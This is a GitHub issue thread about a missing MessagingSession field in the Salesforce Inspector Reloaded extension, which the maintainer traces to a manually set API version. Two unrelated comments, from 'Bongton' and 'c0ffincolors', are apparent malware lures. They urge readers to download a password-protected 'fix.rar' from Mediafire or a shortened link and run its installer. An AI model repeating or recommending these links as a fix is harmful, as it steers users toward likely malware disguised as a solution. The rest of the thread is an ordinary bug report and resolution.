### ISSUE TITLE
[data-export] MessagingSession object missing fields

### ISSUE THREAD

**Issue by sfscgjohnson** [tprouvot/Salesforce-Inspector-reloaded#541]
Bug Description:
When querying MessagingSession Object in SF Inspector I am not seeing the field EndedByType.
When I use other tools - developer console or say Maven tools it shows up.  I see the field on the layout.

1. Go to a MessagingSession
2. Click on the SF Reloaded Tab, Click on Show All Data
3. Search for EndedbyType
4. It is not found
5. Go to data export
6. enter in the query below
select endedbytype from MessagingSession order by createddate desc
7.  Hit Export
8.  Fails with the error
INVALID_FIELD: 
SELECT Id,EndedbyType FROM MessagingSession
          ^
ERROR at Row:1:Column:11
No such column 'EndedbyType' on entity 'MessagingSession'. If you are attempting to use a custom field, be sure to append the '__c' after the custom field name. Please reference your WSDL or the describe call for the appropriate names.

**Expected behavior**
Expected to get results from the query showing the field values.

**Screenshots**
![image](https://github.com/user-attachments/assets/7df1fa1e-b844-4aac-93be-5f176a73f4a3)
Dev Console from the same org
![image](https://github.com/user-attachments/assets/9d14f1f4-836f-4088-a0a7-b8e2f59f9242)
Maven tools from the same org
![image](https://github.com/user-attachments/assets/c2f22e8d-d6f9-414d-b889-c46ed3cdd479)

**Desktop (please complete the following information):**
 - OS: Max OS
 - Browser TEsted on Safari, Vivaldi and Chrom
 - Version [v1.231] 60

Not sure if there are any other fields missing but we do see this one.

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by tprouvot** [comment]
Hi @sfscgjohnson 
I'm not reproducing the error, could you tell me which api version you are using ? 
<img width="427" alt="image" src="https://github.com/user-attachments/assets/f1ca4592-f7d5-49f1-9c6e-801f9df8d488">


Info is available in the bottom left of the popup

**Comment by sfscgjohnson** [comment]
I am not aware that I can change the API version with SF Inspector.  I assume that means I'm using 61 or the latest always.
Is there a way to tell?

**Comment by sfscgjohnson** [comment]
When I changed to 61 it worked.  I thought that was always set to the latest API version.  Is there a way to configure that?

**Comment by tprouvot** [comment]
You may have updated this value manually which override default conf. You can find how to erase the customization in how to section of the documentation website

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by tprouvot** [comment]
Hi @sfscgjohnson 
I checked and the documentation does not mention how to remove the customization of the api version,
I'll update the documentation and provide a way to do so.

**Comment by tprouvot** [comment]
I'll add this new button to reset extension version to default

<img width="885" alt="image" src="https://github.com/user-attachments/assets/f710b049-f0ea-4187-b109-228b9673eae1">

**Comment by tprouvot** [comment]
Hi @sfscgjohnson ! 
I'll release the 1.25 version this week and I'm making a linkedin post, I'll be happy to tag you on the post as reporter who helped the extension. If you are ok you can reach me on my [linkedin profile ](https://www.linkedin.com/in/thomasprouvot/)
